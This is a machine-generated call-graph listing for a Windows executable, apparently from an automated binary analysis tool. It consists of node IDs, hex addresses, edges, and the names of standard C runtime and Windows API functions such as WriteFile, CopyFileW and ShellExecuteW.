8eabfb 54834 8e6e10 8 API calls __mbschr_l 54826->54834 54828->54735 54829->54738 54830->54820 54831->54825 54832->54823 54833->54826 54834->54825 54836 8eb050 __ftell_nolock 54835->54836 54837 8eb0ac 54836->54837 54838 8eb08d 54836->54838 54870 8eb082 54836->54870 54843 8eb105 54837->54843 54844 8eb0e9 54837->54844 54916 8e7bda 47 API calls __getptd_noexit 54838->54916 54839 8ea70c _W_store_winword 6 API calls 54841 8eb86b 54839->54841 54841->54767 54842 8eb092 54917 8e7c0e 47 API calls __getptd_noexit 54842->54917 54846 8eb11c 54843->54846 54922 8ef82f 49 API calls 3 library calls 54843->54922 54919 8e7bda 47 API calls __getptd_noexit 54844->54919 54907 8f3bf2 54846->54907 54848 8eb0ee 54920 8e7c0e 47 API calls __getptd_noexit 54848->54920 54849 8eb099 54918 8e6e10 8 API calls __mbschr_l 54849->54918 54854 8eb12a 54856 8eb44b 54854->54856 54923 8e7a0d 47 API calls 2 library calls 54854->54923 54855 8eb0f5 54921 8e6e10 8 API calls __mbschr_l 54855->54921 54857 8eb7b8 WriteFile 54856->54857 54858 8eb463 54856->54858 54861 8eb7e1 GetLastError 54857->54861 54872 8eb410 54857->54872 54860 8eb55a 54858->54860 54869 8eb479 54858->54869 54865 8eb663 54860->54865 54881 8eb565 54860->54881 54861->54872 54863 8eb150 GetConsoleMode 54863->54856 54866 8eb189 54863->54866 54864 8eb81b 54864->54870 54928 8e7c0e 47 API calls __getptd_noexit 54864->54928 54865->54864 54877 8eb6d8 WideCharToMultiByte 54865->54877 54866->54856 54867 8eb199 GetConsoleCP 54866->54867 54867->54872 54897 8eb1c2 54867->54897 54868 8eb4e9 WriteFile 54868->54861 54873 8eb526 54868->54873 54869->54864 54869->54868 54870->54839 54872->54864 54872->54870 54875 8eb7f7 54872->54875 54873->54869 54873->54872 54884 8eb555 54873->54884 54874 8eb843 54929 8e7bda 47 API calls __getptd_noexit 54874->54929 54879 8eb7fe 54875->54879 54880 8eb812 54875->54880 54876 8eb5de WriteFile 54876->54861 54882 8eb62d 54876->54882 54877->54861 54891 8eb71f 54877->54891 54925 8e7c0e 47 API calls __getptd_noexit 54879->54925 54927 8e7bed 47 API calls 3 library calls 54880->54927 54881->54864 54881->54876 54882->54872 54882->54881 54882->54884 54884->54872 54886 8eb727 WriteFile 54888 8eb77a GetLastError 54886->54888 54886->54891 54887 8eb803 54926 8e7bda 47 API calls __getptd_noexit 54887->54926 54888->54891 54891->54865 54891->54872 54891->54884 54891->54886 54892 8f5884 WriteConsoleW CreateFileW __chsize_nolock 54895 8eb2f6 54892->54895 54893 8eb28f WideCharToMultiByte 54893->54872 54896 8eb2ca WriteFile 54893->54896 54894 8f40f7 59 API calls __chsize_nolock 54894->54897 54895->54861 54895->54872 54895->54892 54895->54897 54898 8eb321 WriteFile 54895->54898 54896->54861 54896->54895 54897->54872 54897->54893 54897->54894 54897->54895 54924 8e1688 57 API calls __isleadbyte_l 54897->54924 54898->54861 54898->54895 54899->54751 54900->54756 54901->54766 54902->54767 54903->54756 54904->54755 54905->54760 54906->54756 54908 8f3bfd 54907->54908 54909 8f3c0a 54907->54909 54910 8e7c0e __mbschr_l 47 API calls 54908->54910 54912 8f3c16 54909->54912 54913 8e7c0e __mbschr_l 47 API calls 54909->54913 54911 8f3c02 54910->54911 54911->54854 54912->54854 54914 8f3c37 54913->54914 54915 8e6e10 __mbschr_l 8 API calls 54914->54915 54915->54911 54916->54842 54917->54849 54918->54870 54919->54848 54920->54855 54921->54870 54922->54846 54923->54863 54924->54897 54925->54887 54926->54870 54927->54870 54928->54874 54929->54870 54934 8c42f6 54930->54934 54933 8c42cc LoadLibraryA GetProcAddress 54933->54430 54935 8c42aa 54934->54935 54936 8c42ff LoadLibraryA 54934->54936 54935->54430 54935->54933 54936->54935 54937 8c4310 GetProcAddress 54936->54937 54937->54935 54939 8df4ea 48 API calls 54938->54939 54940 8c47c9 54939->54940 54940->54435 54942 8c4085 FindResourceExW 54941->54942 54946 8c40a2 54941->54946 54943 934f16 LoadResource 54942->54943 54942->54946 54944 934f2b SizeofResource 54943->54944 54943->54946 54945 934f3f LockResource 54944->54945 54944->54946 54945->54946 54946->54436 54948 934fe0 54947->54948 54949 8c4526 54947->54949 54953 8e3a8d 54949->54953 54951 8c4534 54951->54447 54952->54436 54957 8e3a99 _fseek 54953->54957 54954 8e3aa7 54966 8e7c0e 47 API calls __getptd_noexit 54954->54966 54956 8e3acd 54968 8e4e1c 54956->54968 54957->54954 54957->54956 54959 8e3aac 54967 8e6e10 8 API calls __mbschr_l 54959->54967 54963 8e3ae2 54975 8e3b04 LeaveCriticalSection LeaveCriticalSection _fseek 54963->54975 54964 8e3ab7 _fseek 54964->54951 54966->54959 54967->54964 54969 8e4e4e EnterCriticalSection 54968->54969 54970 8e4e2c 54968->54970 54972 8e3ad3 54969->54972 54970->54969 54971 8e4e34 54970->54971 54973 8e7cf4 __lock 47 API calls 54971->54973 54974 8e39fe 81 API calls 3 library calls 54972->54974 54973->54972 54974->54963 54975->54964 54979 8e3839 54976->54979 54978 8c4510 54978->54455 54980 8e3845 _fseek 54979->54980 54981 8e3888 54980->54981 54982 8e385b _memset 54980->54982 54991 8e3880 _fseek 54980->54991 54983 8e4e1c __lock_file 48 API calls 54981->54983 54992 8e7c0e 47 API calls __getptd_noexit 54982->54992 54985 8e388e 54983->54985 54994 8e365b 62 API calls 6 library calls 54985->54994 54986 8e3875 54993 8e6e10 8 API calls __mbschr_l 54986->54993 54988 8e38a4 54995 8e38c2 LeaveCriticalSection LeaveCriticalSection _fseek 54988->54995 54991->54978 54992->54986 54993->54991 54994->54988 54995->54991 54999 8e344a GetSystemTimeAsFileTime 54996->54999 54998 90bdc3 54998->54457 55000 8e3478 __aulldiv 54999->55000 55000->54998 55002 8e3e71 _fseek 55001->55002 55003 8e3e7f 55002->55003 55004 8e3e94 55002->55004 55015 8e7c0e 47 API calls __getptd_noexit 55003->55015 55005 8e4e1c __lock_file 48 API calls 55004->55005 55007 8e3e9a 55005->55007 55017 8e3b0c 55 API calls 4 library calls 55007->55017 55008 8e3e84 55016 8e6e10 8 API calls __mbschr_l 55008->55016 55011 8e3ea5 55018 8e3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 55011->55018 55012 8e3e8f _fseek 55012->54462 55014 8e3eb7 55014->55012 55015->55008 55016->55012 55017->55011 55018->55014 55024 90c581 __tzset_nolock _wcscmp 55019->55024 55020 8c44ed 64 API calls 55020->55024 55021 90c417 55021->54376 55021->54404 55022 90bf5a GetSystemTimeAsFileTime 55022->55024 55023 8c4517 83 API calls 55023->55024 55024->55020 55024->55021 55024->55022 55024->55023 55025->54403 55027 8e35f0 _fseek 55026->55027 55028 8e361c 55027->55028 55029 8e3604 55027->55029 55031 8e4e1c __lock_file 48 API calls 55028->55031 55036 8e3614 _fseek 55028->55036 55039 8e7c0e 47 API calls __getptd_noexit 55029->55039 55033 8e362e 55031->55033 55032 8e3609 55040 8e6e10 8 API calls __mbschr_l 55032->55040 55041 8e3578 55033->55041 55036->54409 55039->55032 55040->55036 55042 8e359b 55041->55042 55043 8e3587 55041->55043 55044 8e3597 55042->55044 55060 8e2c84 55042->55060 55058 8e7c0e 47 API calls __getptd_noexit 55043->55058 55057 8e3653 LeaveCriticalSection LeaveCriticalSection _fseek 55044->55057 55047 8e358c 55059 8e6e10 8 API calls __mbschr_l 55047->55059 55053 8e35b5 55077 8ee9d2 55053->55077 55055 8e35bb 55055->55044 55056 8e1c9d _free 47 API calls 55055->55056 55056->55044 55057->55036 55058->55047 55059->55044 55061 8e2c97 55060->55061 55065 8e2cbb 55060->55065 55062 8e2933 __ftell_nolock 47 API calls 55061->55062 55061->55065 55063 8e2cb4 55062->55063 55064 8eaf61 __flswbuf 78 API calls 55063->55064 55064->55065 55066 8eeb36 55065->55066 55067 8e35af 55066->55067 55068 8eeb43 55066->55068 55070 8e2933 55067->55070 55068->55067 55069 8e1c9d _free 47 API calls 55068->55069 55069->55067 55071 8e293d 55070->55071 55072 8e2952 55070->55072 55100 8e7c0e 47 API calls __getptd_noexit 55071->55100 55072->55053 55074 8e2942 55101 8e6e10 8 API calls __mbschr_l 55074->55101 55076 8e294d 55076->55053 55078 8ee9de _fseek 55077->55078 55079 8ee9fe 55078->55079 55080 8ee9e6 55078->55080 55081 8eea7b 55079->55081 55086 8eea28 55079->55086 55102 8e7bda 47 API calls __getptd_noexit 55080->55102 55106 8e7bda 47 API calls __getptd_noexit 55081->55106 55083 8ee9eb 55103 8e7c0e 47 API calls __getptd_noexit 55083->55103 55085 8eea80 55107 8e7c0e 47 API calls __getptd_noexit 55085->55107 55089 8ea8ed ___lock_fhandle 49 API calls 55086->55089 55092 8eea2e 55089->55092 55090 8ee9f3 _fseek 55090->55055 55091 8eea88 55108 8e6e10 8 API calls __mbschr_l 55091->55108 55094 8eea4c 55092->55094 55095 8eea41 55092->55095 55104 8e7c0e 47 API calls __getptd_noexit 55094->55104 55096 8eea9c __close_nolock 50 API calls 55095->55096 55098 8eea47 55096->55098 55105 8eea73 LeaveCriticalSection __unlock_fhandle 55098->55105 55100->55074 55101->55076 55102->55083 55103->55090 55104->55098 55105->55090 55106->55085 55107->55091 55108->55090 55109 8c40a7 55114 8ef8a0 55109->55114 55113 8c40dc 55115 8c40b4 GetLongPathNameW 55114->55115 55116 8c6a63 55115->55116 55117 8c6adf 55116->55117 55119 8c6a6f __wsetenvp 55116->55119 55131 8cb18b 55117->55131 55120 8c6a8b 55119->55120 55121 8c6ad7 55119->55121 55127 8c6b4a 55120->55127 55130 8cc369 48 API calls 55121->55130 55124 8c6a95 55125 8dee75 48 API calls 55124->55125 55126 8c6ab6 ___crtGetEnvironmentStringsW 55125->55126 55126->55113 55128 8df4ea 48 API calls 55127->55128 55129 8c6b54 55128->55129 55129->55124 55130->55126 55132 8cb199 55131->55132 55134 8cb1a2 ___crtGetEnvironmentStringsW 55131->55134 55132->55134 55135 8cbdfa 48 API calls ___crtGetEnvironmentStringsW 55132->55135 55134->55126 55135->55134 55136 8d45e0 55137 8d479f 55136->55137 55138 8d4637 55136->55138 55139 8cce19 48 API calls 55137->55139 55142 936e05 55138->55142 55197 8d4300 87 API calls ___crtGetEnvironmentStringsW 55138->55197 55140 8d46e4 55139->55140 55149 8c4252 84 API calls 55140->55149 55150 916ff0 55140->55150 55157 906524 55140->55157 55160 90fa0c 55140->55160 55144 8d4739 Mailbox 55142->55144 55198 90cc5c 86 API calls 3 library calls 55142->55198 55143 8d4659 55143->55140 55143->55142 55143->55144 55149->55144 55151 8c936c 81 API calls 55150->55151 55152 91702a 55151->55152 55199 8cb470 55152->55199 55154 91703a 55156 917063 55154->55156 55227 8ccdb9 48 API calls 55154->55227 55156->55144 55243 906ca9 GetFileAttributesW 55157->55243 55161 90fa1c __ftell_nolock 55160->55161 55162 90fa44 55161->55162 55299 8cd286 48 API calls 55161->55299 55164 8c936c 81 API calls 55162->55164 55166 90fa5e 55164->55166 55165 90fb92 55165->55144 55166->55165 55167 90fa80 55166->55167 55168 90fb68 55166->55168 55169 8c936c 81 API calls 55167->55169 55170 8c41a9 136 API calls 55168->55170 55175 90fa8c _wcscpy _wcschr 55169->55175 55171 90fb79 55170->55171 55172 90fb8e 55171->55172 55174 8c41a9 136 API calls 55171->55174 55172->55165 55173 8c936c 81 API calls 55172->55173 55184 90fbc7 _wcscat __wsplitpath _wcscpy 55173->55184 55174->55172 55178 90fab0 _wcscat _wcscpy 55175->55178 55181 90fade _wcscat 55175->55181 55176 8c936c 81 API calls 55177 90fafc _wcscpy 55176->55177 55300 9072cb GetFileAttributesW 55177->55300 55179 8c936c 81 API calls 55178->55179 55179->55181 55181->55176 55182 90fb1c __wsetenvp 55182->55165 55183 8c936c 81 API calls 55182->55183 55185 90fb48 55183->55185 55187 8c936c 81 API calls 55184->55187 55301 9060dd 77 API calls 4 library calls 55185->55301 55189 90fc82 55187->55189 55188 90fb5c 55188->55165 55190 906524 3 API calls 55189->55190 55191 90fcb1 55190->55191 55192 8c936c 81 API calls 55191->55192 55195 90fce2 55191->55195 55193 90fccb 55192->55193 55248 90bfa4 55193->55248 55196 8c4252 84 API calls 55195->55196 55196->55165 55197->55143 55198->55144 55228 8c6b0f 55199->55228 55201 8cb69b 55236 8cba85 48 API calls ___crtGetEnvironmentStringsW 55201->55236 55203 8cb6b5 55203->55154 55206 8cba85 48 API calls 55218 8cb495 55206->55218 55207 93397b 55240 9026bc 88 API calls 3 library calls 55207->55240 55210 8cb9e4 55242 9026bc 88 API calls 3 library calls 55210->55242 55211 933973 55211->55203 55214 8cbcce 48 API calls 55214->55218 55215 933989 55241 8cba85 48 API calls ___crtGetEnvironmentStringsW 55215->55241 55217 933909 55220 8c6b4a 48 API calls 55217->55220 55218->55201 55218->55206 55218->55207 55218->55210 55218->55214 55218->55217 55219 8cbb85 48 API calls 55218->55219 55226 933939 ___crtGetEnvironmentStringsW 55218->55226 55233 8cc413 59 API calls 55218->55233 55234 8cbdfa 48 API calls ___crtGetEnvironmentStringsW 55218->55234 55235 8cbc74 48 API calls 55218->55235 55237 8cc6a5 49 API calls 55218->55237 55238 8cc799 48 API calls ___crtGetEnvironmentStringsW 55218->55238 55219->55218 55222 933914 55220->55222 55225 8df4ea 48 API calls 55222->55225 55224 8cb66c CharUpperBuffW 55224->55218 55225->55226 55239 9026bc 88 API calls 3 library calls 55226->55239 55227->55156 55229 8df4ea 48 API calls 55228->55229 55230 8c6b34 55229->55230 55231 8c6b4a 48 API calls 55230->55231 55232 8c6b43 55231->55232 55232->55218 55233->55218 55234->55224 55235->55218 55236->55203 55237->55218 55238->55218 55239->55211 55240->55215 55241->55211 55242->55211 55244 906529 55243->55244 55245 906cc4 FindFirstFileW 55243->55245 55244->55144 55246 906cd5 55245->55246 55247 906cd9 FindClose 55245->55247 55246->55244 55247->55244 55249 90bfb1 __ftell_nolock 55248->55249 55250 8df4ea 48 API calls 55249->55250 55251 90c00e 55250->55251 55252 8c47b7 48 API calls 55251->55252 55253 90c018 55252->55253 55254 90bdb4 GetSystemTimeAsFileTime 55253->55254 55255 90c023 55254->55255 55256 8c4517 83 API calls 55255->55256 55257 90c036 _wcscmp 55256->55257 55258 90c107 55257->55258 55259 90c05a 55257->55259 55260 90c56d 94 API calls 55258->55260 55261 90c56d 94 API calls 55259->55261 55270 90c05f _wcscat __wsplitpath _wcscpy 55260->55270 55261->55270 55262 8c44ed 64 API calls 55264 90c12c 55262->55264 55263 90c110 55263->55195 55265 8c44ed 64 API calls 55264->55265 55266 90c13c 55265->55266 55267 8c44ed 64 API calls 55266->55267 55268 90c157 55267->55268 55269 8c44ed 64 API calls 55268->55269 55271 90c167 55269->55271 55270->55262 55270->55263 55272 8c44ed 64 API calls 55271->55272 55273 90c182 55272->55273 55274 8c44ed 64 API calls 55273->55274 55275 90c192 55274->55275 55276 8c44ed 64 API calls 55275->55276 55277 90c1a2 55276->55277 55278 8c44ed 64 API calls 55277->55278 55279 90c1b2 55278->55279 55302 90c71a GetTempPathW GetTempFileNameW 55279->55302 55281 90c1be 55282 8e3499 117 API calls 55281->55282 55292 90c1cf 55282->55292 55283 90c289 55284 8e35e4 __fcloseall 83 API calls 55283->55284 55285 90c294 55284->55285 55287 90c29a DeleteFileW 55285->55287 55288 90c2ae 55285->55288 55286 8c44ed 64 API calls 55286->55292 55287->55263 55289 90c342 CopyFileW 55288->55289 55294 90c2b8 55288->55294 55290 90c358 DeleteFileW 55289->55290 55291 90c36a DeleteFileW 55289->55291 55290->55263 55316 90c6d9 CreateFileW 55291->55316 55292->55263 55292->55283 55292->55286 55303 8e2aae 55292->55303 55319 90b965 118 API calls __fcloseall 55294->55319 55297 90c32d 55297->55291 55298 90c331 DeleteFileW 55297->55298 55298->55263 55299->55162 55300->55182 55301->55188 55302->55281 55304 8e2aba _fseek 55303->55304 55305 8e2ae4 _fseek 55304->55305 55306 8e2aec 55304->55306 55307 8e2ad4 55304->55307 55305->55292 55308 8e4e1c __lock_file 48 API calls 55306->55308 55332 8e7c0e 47 API calls __getptd_noexit 55307->55332 55311 8e2af2 55308->55311 55310 8e2ad9 55333 8e6e10 8 API calls __mbschr_l 55310->55333 55320 8e2957 55311->55320 55317 90c715 55316->55317 55318 90c6ff SetFileTime CloseHandle 55316->55318 55317->55263 55318->55317 55319->55297 55323 8e2966 55320->55323 55328 8e2984 55320->55328 55321 8e2974 55335 8e7c0e 47 API calls __getptd_noexit 55321->55335 55323->55321 55325 8e299c ___crtGetEnvironmentStringsW 55323->55325 55323->55328 55324 8e2979 55336 8e6e10 8 API calls __mbschr_l 55324->55336 55325->55328 55329 8e2c84 __flush 78 API calls 55325->55329 55330 8e2933 __ftell_nolock 47 API calls 55325->55330 55331 8eaf61 __flswbuf 78 API calls 55325->55331 55337 8e8e63 78 API calls 5 library calls 55325->55337 55334 8e2b24 LeaveCriticalSection LeaveCriticalSection _fseek 55328->55334 55329->55325 55330->55325 55331->55325 55332->55310 55333->55305 55334->55305 55335->55324 55336->55328 55337->55325 55338 8c2322 55339 8c2344 55338->55339 55371 8c26df 55339->55371 55346 8cd7f7 48 API calls 55347 8c238e 55346->55347 55348 8cd7f7 48 API calls 55347->55348 55349 8c2398 55348->55349 55350 8cd7f7 48 API calls 55349->55350 55351 8c23de 55350->55351 55352 8cd7f7 48 API calls 55351->55352 55353 8c24c1 55352->55353 55384 8c263f 55353->55384 55357 8c24f1 55358 8cd7f7 48 API calls 55357->55358 55359 8c24fb 55358->55359 55413 8c2745 55359->55413 55361 8c2546 55362 8c2556 GetStdHandle 55361->55362 55363 8c25b1 55362->55363 55364 93501d 55362->55364 55365 8c25b7 CoInitialize 55363->55365 55364->55363 55366 935026 55364->55366 55420 9092d4 53 API calls 55366->55420 55368 93502d 55421 9099f9 CreateThread 55368->55421 55370 935039 CloseHandle 55370->55365 55422 8c2854 55371->55422 55374 8c6a63 48 API calls 55375 8c234a 55374->55375 55376 8c272e 55375->55376 55436 8c27ec 6 API calls 55376->55436 55378 8c237a 55379 8cd7f7 55378->55379 55380 8df4ea 48 API calls 55379->55380 55381 8cd818 55380->55381 55382 8df4ea 48 API calls 55381->55382 55383 8c2384 55382->55383 55383->55346 55385 8cd7f7 48 API calls 55384->55385 55386 8c264f 55385->55386 55387 8cd7f7 48 API calls 55386->55387 55388 8c2657 55387->55388 55437 8c26a7 55388->55437 55391 8c26a7 48 API calls 55392 8c2667 55391->55392 55393 8cd7f7 48 API calls 55392->55393 55394 8c2672 55393->55394 55395 8df4ea 48 API calls 55394->55395 55396 8c24cb 55395->55396 55397 8c22a4 55396->55397 55398 8c22b2 55397->55398 55399 8cd7f7 48 API calls 55398->55399 55400 8c22bd 55399->55400 55401 8cd7f7 48 API calls 55400->55401 55402 8c22c8 55401->55402 55403 8cd7f7 48 API calls 55402->55403 55404 8c22d3 55403->55404 55405 8cd7f7 48 API calls 55404->55405 55406 8c22de 55405->55406 55407 8c26a7 48 API calls 55406->55407 55408 8c22e9 55407->55408 55409 8df4ea 48 API calls 55408->55409 55410 8c22f0 55409->55410 55411 931fe7 55410->55411 55412 8c22f9 RegisterWindowMessageW 55410->55412 55412->55357 55414 8c2755 55413->55414 55415 935f4d 55413->55415 55417 8df4ea 48 API calls 55414->55417 55442 90c942 50 API calls 55415->55442 55419 8c275d 55417->55419 55418 935f58 55419->55361 55420->55368 55421->55370 55443 9099df 54 API calls 55421->55443 55429 8c2870 55422->55429 55425 8c2870 48 API calls 55426 8c2864 55425->55426 55427 8cd7f7 48 API calls 55426->55427 55428 8c2716 55427->55428 55428->55374 55430 8cd7f7 48 API calls 55429->55430 55431 8c287b 55430->55431 55432 8cd7f7 48 API calls 55431->55432 55433 8c2883 55432->55433 55434 8cd7f7 48 API calls 55433->55434 55435 8c285c 55434->55435 55435->55425 55436->55378 55438 8cd7f7 48 API calls 55437->55438 55439 8c26b0 55438->55439 55440 8cd7f7 48 API calls 55439->55440 55441 8c265f 55440->55441 55441->55391 55442->55418 55444 8c3742 55445 8c374b 55444->55445 55446 8c37c8 55445->55446 55447 8c3769 55445->55447 55481 8c37c6 55445->55481 55451 8c37ce 55446->55451 55452 931e00 55446->55452 55448 8c382c PostQuitMessage 55447->55448 55449 8c3776 55447->55449 55486 8c37b9 55448->55486 55454 931e88 55449->55454 55455 8c3781 55449->55455 55450 8c37ab DefWindowProcW 55450->55486 55456 8c37f6 SetTimer RegisterWindowMessageW 55451->55456 55457 8c37d3 55451->55457 55499 8c2ff6 16 API calls 55452->55499 55514 904ddd 60 API calls _memset 55454->55514 55459 8c3789 55455->55459 55460 8c3836 55455->55460 55461 8c381f CreatePopupMenu 55456->55461 55456->55486 55463 931da3 55457->55463 55464 8c37da KillTimer 55457->55464 55458 931e27 55500 8de312 56 API calls 55458->55500 55466 8c3794 55459->55466 55467 931e6d 55459->55467 55489 8deb83 55460->55489 55461->55486 55470 931da8 55463->55470 55471 931ddc MoveWindow 55463->55471 55496 8c3847 Shell_NotifyIconW _memset 55464->55496 55473 931e58 55466->55473 55482 8c379f 55466->55482 55467->55450 55513 8fa5f3 48 API calls 55467->55513 55468 931e9a 55468->55450 55468->55486 55474 931dcb SetFocus 55470->55474 55475 931dac 55470->55475 55471->55486 55512 9055bd 70 API calls _memset 55473->55512 55474->55486 55478 931db5 55475->55478 55475->55482 55476 8c37ed 55497 8c390f DeleteObject DestroyWindow 55476->55497 55498 8c2ff6 16 API calls 55478->55498 55481->55450 55482->55450 55501 8c3847 Shell_NotifyIconW _memset 55482->55501 55484 931e68 55484->55486 55487 931e4c 55502 8c4ffc 55487->55502 55490 8dec1c 55489->55490 55491 8deb9a _memset 55489->55491 55490->55486 55515 8c51af 55491->55515 55493 8dec05 KillTimer SetTimer 55493->55490 55494 8debc1 55494->55493 55495 933c7a Shell_NotifyIconW 55494->55495 55495->55493 55496->55476 55497->55486 55498->55486 55499->55458 55500->55482 55501->55487 55503 8c5027 _memset 55502->55503 55558 8c4c30 55503->55558 55507 8c50ca Shell_NotifyIconW 55510 8c51af 50 API calls 55507->55510 55508 933d28 Shell_NotifyIconW 55509 8c50ac 55509->55507 55509->55508 55511 8c50df 55510->55511 55511->55481 55512->55484 55513->55481 55514->55468 55516 8c51cb 55515->55516 55536 8c52a2 55515->55536 55517 8c6b0f 48 API calls 55516->55517 55518 8c51d9 55517->55518 55519 933ca1 LoadStringW 55518->55519 55520 8c51e6 55518->55520 55523 933cbb 55519->55523 55521 8c6a63 48 API calls 55520->55521 55522 8c51fb 55521->55522 55522->55523 55524 8c520c 55522->55524 55525 8c510d 48 API calls 55523->55525 55526 8c5216 55524->55526 55527 8c52a7 55524->55527 55530 933cc5 55525->55530 55528 8c510d 48 API calls 55526->55528 55537 8c6eed 48 API calls 55527->55537 55532 8c5220 _memset _wcscpy 55528->55532 55530->55532 55538 8c518c 55530->55538 55534 8c5288 Shell_NotifyIconW 55532->55534 55533 933ce7 55535 8c518c 48 API calls 55533->55535 55534->55536 55535->55532 55536->55494 55537->55532 55539 8c5197 55538->55539 55540 8c519f 55539->55540 55541 931ace 55539->55541 55548 8c5130 55540->55548 55543 8c6b4a 48 API calls 55541->55543 55545 931adb __wsetenvp 55543->55545 55544 8c51aa 55544->55533 55546 8dee75 48 API calls 55545->55546 55547 931b07 ___crtGetEnvironmentStringsW 55546->55547 55549 8c513f __wsetenvp 55548->55549 55550 931b27 55549->55550 55551 8c5151 55549->55551 55553 8c6b4a 48 API calls 55550->55553 55552 8cbb85 48 API calls 55551->55552 55554 8c515e ___crtGetEnvironmentStringsW 55552->55554 55555 931b34 55553->55555 55554->55544 55556 8dee75 48 API calls 55555->55556 55557 931b57 ___crtGetEnvironmentStringsW 55556->55557 55559 933c33 55558->55559 55560 8c4c44 55558->55560 55559->55560 55561 933c3c DestroyIcon 55559->55561 55560->55509 55562 905819 61 API calls _W_store_winword 55560->55562 55561->55560 55562->55509 55563 8c3aa3 SystemParametersInfoW 55564 8c3ac8 55563->55564 55565 8e5dfd 55566 8e5e09 _fseek 55565->55566 55600 8e7eeb GetStartupInfoW 55566->55600 55569 8e5e0e 55602 8e9ca7 GetProcessHeap 55569->55602 55570 8e5e66 55571 8e5e71 55570->55571 55674 8e5f4d 47 API calls 3 library calls 55570->55674 55603 8e7b47 55571->55603 55574 8e5e77 55576 8e5e82 __RTC_Initialize 55574->55576 55675 8e5f4d 47 API calls 3 library calls 55574->55675 55624 8eacb3 55576->55624 55578 8e5e91 55579 8e5e9d GetCommandLineW 55578->55579 55676 8e5f4d 47 API calls 3 library calls 55578->55676 55643 8f2e7d GetEnvironmentStringsW 55579->55643 55582 8e5e9c 55582->55579 55586 8e5ec2 55656 8f2cb4 55586->55656 55590 8e5ed3 55670 8e1195 55590->55670 55593 8e5edb 55595 8e5ee6 __wwincmdln 55593->55595 55679 8e115b 47 API calls 3 library calls 55593->55679 55596 8e5f09 55595->55596 55680 8e13f1 47 API calls _doexit 55595->55680 55681 8e1186 47 API calls _doexit 55596->55681 55599 8e5f0e _fseek 55601 8e7f01 55600->55601 55601->55569 55602->55570 55682 8e123a 30 API calls 2 library calls 55603->55682 55605 8e7b4c 55683 8e7e23 InitializeCriticalSectionAndSpinCount 55605->55683 55607 8e7b51 55608 8e7b55 55607->55608 55685 8e7e6d TlsAlloc 55607->55685 55684 8e7bbd 50 API calls 2 library calls 55608->55684 55611 8e7b67 55611->55608 55613 8e7b72 55611->55613 55612 8e7b5a 55612->55574 55614 8e6986 __calloc_crt 47 API calls 55613->55614 55615 8e7b7f 55614->55615 55616 8e7bb4 55615->55616 55686 8e7ec9 TlsSetValue 55615->55686 55688 8e7bbd 50 API calls 2 library calls 55616->55688 55619 8e7b93 55619->55616 55621 8e7b99 55619->55621 55620 8e7bb9 55620->55574 55687 8e7a94 47 API calls 4 library calls 55621->55687 55623 8e7ba1 GetCurrentThreadId 55623->55574 55625 8eacbf _fseek 55624->55625 55626 8e7cf4 __lock 47 API calls 55625->55626 55627 8eacc6 55626->55627 55628 8e6986 __calloc_crt 47 API calls 55627->55628 55630 8eacd7 55628->55630 55629 8ead42 GetStartupInfoW 55638 8eae80 55629->55638 55640 8ead57 55629->55640 55630->55629 55631 8eace2 _fseek @_EH4_CallFilterFunc@8 55630->55631 55631->55578 55632 8eaf44 55689 8eaf58 LeaveCriticalSection _doexit 55632->55689 55634 8eaec9 GetStdHandle 55634->55638 55635 8e6986 __calloc_crt 47 API calls 55635->55640 55636 8eaedb GetFileType 55636->55638 55637 8eada5 55637->55638 55641 8eadd7 GetFileType 55637->55641 55642 8eade5 InitializeCriticalSectionAndSpinCount 55637->55642 55638->55632 55638->55634 55638->55636 55639 8eaf08 InitializeCriticalSectionAndSpinCount 55638->55639 55639->55638 55640->55635 55640->55637 55640->55638 55641->55637 55641->55642 55642->55637 55644 8e5ead 55643->55644 55646 8f2e8e 55643->55646 55650 8f2a7b GetModuleFileNameW 55644->55650 55645 8f2ea9 55690 8e69d0 47 API calls _W_store_winword 55645->55690 55646->55645 55646->55646 55648 8f2eb4 ___crtGetEnvironmentStringsW 55649 8f2eca FreeEnvironmentStringsW 55648->55649 55649->55644 55651 8f2aaf _wparse_cmdline 55650->55651 55652 8e5eb7 55651->55652 55653 8f2ae9 55651->55653 55652->55586 55677 8e115b 47 API calls 3 library calls 55652->55677 55691 8e69d0 47 API calls _W_store_winword 55653->55691 55655 8f2aef _wparse_cmdline 55655->55652 55657 8f2ccd __wsetenvp 55656->55657 55661 8e5ec8 55656->55661 55658 8e6986 __calloc_crt 47 API calls 55657->55658 55666 8f2cf6 __wsetenvp 55658->55666 55659 8f2d4d 55660 8e1c9d _free 47 API calls 55659->55660 55660->55661 55661->55590 55678 8e115b 47 API calls 3 library calls 55661->55678 55662 8e6986 __calloc_crt 47 API calls 55662->55666 55663 8f2d72 55664 8e1c9d _free 47 API calls 55663->55664 55664->55661 55666->55659 55666->55661 55666->55662 55666->55663 55667 8f2d89 55666->55667 55692 8f2567 47 API calls __mbschr_l 55666->55692 55668 8e6e20 __invoke_watson 8 API calls 55667->55668 55669 8f2d95 55668->55669 55671 8e11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 55670->55671 55673 8e11e0 __IsNonwritableInCurrentImage 55671->55673 55693 8e0f0a 52 API calls __cinit 55671->55693 55673->55593 55674->55571 55675->55576 55676->55582 55680->55596 55681->55599 55682->55605 55683->55607 55684->55612 55685->55611 55686->55619 55687->55623 55688->55620 55689->55631 55690->55648 55691->55655 55692->55666 55693->55673 55694 8c3d98 55695 8c3e3a 55694->55695 55696 8c3da0 GetFullPathNameW 55694->55696 55697 8c3e41 SetCurrentDirectoryW 55695->55697 55698 8c6a63 48 API calls 55696->55698 55700 8c3e4e 55697->55700 55699 8c3ddb 55698->55699 55732 8c6430 55699->55732 55703 8c3df6 55705 8c3e00 55703->55705 55757 9071fa AllocateAndInitializeSid CheckTokenMembership FreeSid 55703->55757 55704 931cf8 55706 931cff SetCurrentDirectoryW 55704->55706 55748 8c3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 55705->55748 55706->55700 55711 931d1c 55711->55705 55713 931d2d 55711->55713 55712 8c3e0a 55715 8c4ffc 67 API calls 55712->55715 55718 8c3e1f 55712->55718 55758 8c5374 55713->55758 55715->55718 55716 931d35 55717 8cce19 48 API calls 55716->55717 55719 931d42 55717->55719 55718->55695 55756 8c3847 Shell_NotifyIconW _memset 55718->55756 55721 931d49 55719->55721 55722 931d6e 55719->55722 55724 8c518c 48 API calls 55721->55724 55723 8c518c 48 API calls 55722->55723 55725 931d6a GetForegroundWindow ShellExecuteW 55723->55725 55726 931d54 55724->55726 55730 931d9e 55725->55730 55727 8c510d 48 API calls 